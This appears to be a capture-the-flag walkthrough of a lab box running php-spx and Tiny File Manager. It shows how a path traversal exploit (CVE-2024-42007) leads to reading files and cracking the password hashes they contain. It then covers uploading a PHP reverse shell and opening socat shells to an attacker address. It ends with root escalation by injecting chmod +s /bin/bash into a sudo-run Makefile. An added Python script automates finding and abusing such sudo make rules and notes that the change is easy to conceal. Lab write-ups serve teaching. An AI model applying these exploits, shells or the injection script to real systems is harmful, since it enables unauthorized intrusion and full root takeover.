Key takeaways
- PHP extension vulnerability (php-spx): path traversal giving arbitrary file read, i.e. local file inclusion
- Privilege escalation through sudo make install
Detailed steps
Start with nmap. The box appears to be running Tiny File Manager, but the default credential combinations did not work, and neither did weak passwords, so it needs a closer look.
Starting Nmap 7.95 ( https://nmap.org ) at 2024-10-25 15:20 China Standard Time
Stats: 0:01:20 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 32.68% done; ETC: 15:24 (0:02:37 remaining)
Stats: 0:03:46 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 96.06% done; ETC: 15:24 (0:00:09 remaining)
Nmap scan report for 192.168.207.108
Host is up (0.075s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA)
|_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519)
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Tiny File Manager
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Directory brute-forcing with several wordlists turned up only phpinfo.php.
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.207.108
[+] Method: GET
[+] Threads: 10
[+] Wordlist: C:\Users\Administrator\Documents\tools\SecLists-2024.3\SecLists-2024.3\Discovery\Web-Content\quickhits.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
......
......
/index.phps (Status: 403) [Size: 280]
/phpinfo.php (Status: 200) [Size: 74734]
/server-status/ (Status: 403) [Size: 280]
Progress: 2565 / 2566 (99.96%)
===============================================================
Finished
===============================================================
phpinfo.php, however, shows that the php-spx profiling extension is loaded, along with its version number and its access key (the spx.http_key value).
That version of php-spx has a known path traversal, which the writeup treats as local file inclusion: Novel Escape from the SPX jungle - Path traversal in PHP-SPX (CVE-2024-42007) - vsociety
Reading the advisory carefully: with the key from phpinfo, the SPX_UI_URI parameter can be pointed outside the web UI asset directory, so 192.168.126.108/index.php?SPX_KEY=a2a90ca2f9f0ea04d267b16fb8e63800&SPX_UI_URI=%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fvar%2fwww%2fhtml%2findex.php downloads index.php
index.php contains the user names and password hashes:
$auth_users = array(
'admin' => '$2y$10$7LaMUa8an8NrvnQsj5xZ3eDdOejgLyXE8IIvsC.hFy1dg7rPb9cqG',
'user' => '$2y$10$x8PS6i0Sji2Pglyz7SLFruYFpAsz9XAYsdiPyfse6QDkB/QsdShxi'
);
Cracking them with john against rockyou gives two passwords; the admin user's password is lowprofile
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> john --wordlist=/usr/share/wordlists/rockyou.txt password1.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:10:00 0.45% (ETA: 2024-12-28 22:34) 0g/s 129.3p/s 129.3c/s 129.3C/s wazup1..tyisha
0g 0:00:10:02 0.45% (ETA: 2024-12-28 22:34) 0g/s 129.4p/s 129.4c/s 129.4C/s skyliner..shawn5
0g 0:00:10:03 0.45% (ETA: 2024-12-28 22:33) 0g/s 129.4p/s 129.4c/s 129.4C/s romeo11..regiment
profiler (?)
1g 0:00:15:26 DONE (2024-12-27 09:51) 0.001079g/s 131.9p/s 131.9c/s 131.9C/s proper..powerofthree
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> john --wordlist=/usr/share/wordlists/rockyou.txt password2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
lowprofile (?)
1g 0:00:27:01 DONE (2024-12-27 10:18) 0.000616g/s 133.9p/s 133.9c/s 133.9C/s lozano1..loverich
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Copy a PHP reverse shell, change the IP/port, and upload it through Tiny File Manager.
Browsing to php-reverse-shell.php gives a reverse shell (when the reverse shell does not come back and it is not a firewall problem, it is almost always the VPN; restarting the VPN fixes it).
The reverse shell works, but there is no Python on the box, so the usual pty.spawn trick for a full TTY is unavailable. Without a TTY, commands that need a terminal fail; sudo -l in particular refuses to prompt for a password without one, and sudo matters a lot on this box. (script -qc /bin/bash /dev/null, from util-linux, is a Python-free way to get a pty that is worth trying before uploading anything.)
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.173] from (UNKNOWN) [192.168.126.108] 53896
SOCKET: Shell has connected! PID: 52895
whereis python
python:
There is also a profiler user under /home. I had no password for it, so I tried the only two I had, profiler and lowprofile, and lowprofile worked.
su profiler
Password: lowprofile
id
uid=1000(profiler) gid=1000(profiler) groups=1000(profiler)
Next, upload a socat binary to the target, then on the attacking machine run:
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> socat file:`tty`,raw,echo=0 tcp-listen:1234
And on the target (the first attempt calls the system socat with a placeholder address and fails because socat is not installed; the second uses the uploaded binary and the real listener address):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444
bash: line 5: socat: command not found
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.45.173:1234
That gives a new reverse shell with a full TTY, and sudo -l shows that profiler may run make install on php-spx as root:
C:\home\kali\Documents\OFFSEC\GoToWork\SPX> socat file:`tty`,raw,echo=0 tcp-listen:1234
profiler@spx:/tmp$ id
uid=1000(profiler) gid=1000(profiler) groups=1000(profiler)
profiler@spx:/tmp$ sudo -l
[sudo] password for profiler:
Matching Defaults entries for profiler on spx:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
use_pty
User profiler may run the following commands on spx:
(ALL) /usr/bin/make install -C /home/profiler/php-spx
The Makefile lives in profiler's home directory and is writable, and under sudo make runs every recipe line as root, so edit /home/profiler/php-spx/Makefile and add a chmod +s /bin/bash line to the install-modules recipe (recipe lines must begin with a tab):
install-modules: build-modules
	@test -d modules && \
		$(mkinstalldirs) $(INSTALL_ROOT)$(EXTENSION_DIR)
	@echo "Installing shared extensions: $(INSTALL_ROOT)$(EXTENSION_DIR)/"
	@echo "Chmod +s /bin/bash"
	@chmod +s /bin/bash
	@rm -f modules/*.la >/dev/null 2>&1
	@$(INSTALL) modules/* $(INSTALL_ROOT)$(EXTENSION_DIR)
Running sudo /usr/bin/make install -C /home/profiler/php-spx now leaves /bin/bash setuid root (chmod +s sets both the setuid and setgid bits, hence rwsr-sr-x below), and bash -p keeps the effective uid instead of dropping it, so the privilege escalation succeeds:
profiler@spx:~/php-spx$ sudo /usr/bin/make install -C /home/profiler/php-spx
make: Entering directory '/home/profiler/php-spx'
Installing shared extensions: /usr/lib/php/20210902/
Chmod +s /bin/bash
Installing SPX web UI to: /usr/share/misc/php-spx/assets/web-ui
make: Leaving directory '/home/profiler/php-spx'
profiler@spx:~/php-spx$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1396520 Mar 14 2024 /bin/bash
profiler@spx:~/php-spx$ /bin/bash -p
bash-5.1# cat /root/proof.txt
e6d4f6bb0c478a658b361d95c1b51145
bash-5.1#
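As an added example (not from the writeup), the same check and injection done generically: given sudo -l output, find every make install -C rule, test whether its Makefile is writable, and, instead of editing an existing recipe, append a prerequisite-only rule that GNU make merges with the existing install target. The sample sudo -l text is constructed from the one above, the demo runs make against a throwaway Makefile with a harmless payload in place of chmod +s, and the function names are this example's own:

```python
#!/usr/bin/env python3
"""Added example: detect and abuse a 'sudo make install -C <dir>' rule whose
Makefile the calling user can write.  Names are this example's own."""
import os
import re
import shutil
import subprocess
import tempfile

# Constructed sample of `sudo -l` output, modelled on the writeup's.
SAMPLE_SUDO_L = """User profiler may run the following commands on spx:
    (ALL) /usr/bin/make install -C /home/profiler/php-spx
"""

# "(ALL) [NOPASSWD:] /path/to/make install -C <dir>"
SUDO_MAKE_RE = re.compile(
    r"\([^)]*\)\s+(?:NOPASSWD:\s*)?(\S*make)\s+install\s+-C\s+(\S+)")


def sudo_make_dirs(sudo_l_output):
    """Directories in which sudo lets this user run `make install -C`."""
    return [d for _, d in SUDO_MAKE_RE.findall(sudo_l_output)]


def makefile_is_writable(directory):
    """True if we can change (or create) the Makefile that make will read as root."""
    mk = os.path.join(directory, "Makefile")
    if os.path.exists(mk):
        return os.access(mk, os.W_OK)
    return os.access(directory, os.W_OK)


def check_rules(sudo_l_output):
    """[(directory, writable)] for every make install -C rule found."""
    return [(d, makefile_is_writable(d)) for d in sudo_make_dirs(sudo_l_output)]


def inject_makefile(directory, recipe_line):
    """Append a prerequisite-only rule.  GNU make merges the prerequisites of
    every rule for a target, so the existing install recipe is untouched and
    __pwn is built before install's own recipe runs.  Recipe lines must start
    with a tab, which is why the writeup's hand edit is easy to get wrong."""
    with open(os.path.join(directory, "Makefile"), "a") as f:
        f.write(f"\ninstall: __pwn\n__pwn:\n\t{recipe_line}\n")


def demo(marker="pwned"):
    """Run the injection against a throwaway Makefile shaped like php-spx's,
    with a harmless payload.  Returns 'ok', 'fail', or 'skipped' (no make)."""
    if shutil.which("make") is None:
        return "skipped"
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "Makefile"), "w") as f:
            f.write("install: install-modules\n"
                    "install-modules:\n\t@echo installing >> log\n")
        inject_makefile(d, f"@echo {marker} >> log")
        try:
            r = subprocess.run(["make", "-s", "install", "-C", d],
                               capture_output=True, text=True)
        except OSError:
            return "skipped"
        if r.returncode != 0:
            return "fail"
        with open(os.path.join(d, "log")) as f:
            ran = f.read().split()
        # Both the original recipe and the injected one ran under `make install`.
        return "ok" if marker in ran and "installing" in ran else "fail"


if __name__ == "__main__":
    for d, writable in check_rules(SAMPLE_SUDO_L):
        print(f"{d}: Makefile writable = {writable}")
    print("demo:", demo())
```

On the target the recipe line would be the writeup's chmod +s /bin/bash; because the appended rule never touches the original install-modules recipe, the package still installs normally and the only visible change is the extra target, which is also easy to remove afterwards. The defensive reading is the same check in reverse: a sudo rule that runs make against a directory the user can write is a root shell, and the fix is to point the rule at a root-owned copy of the tree.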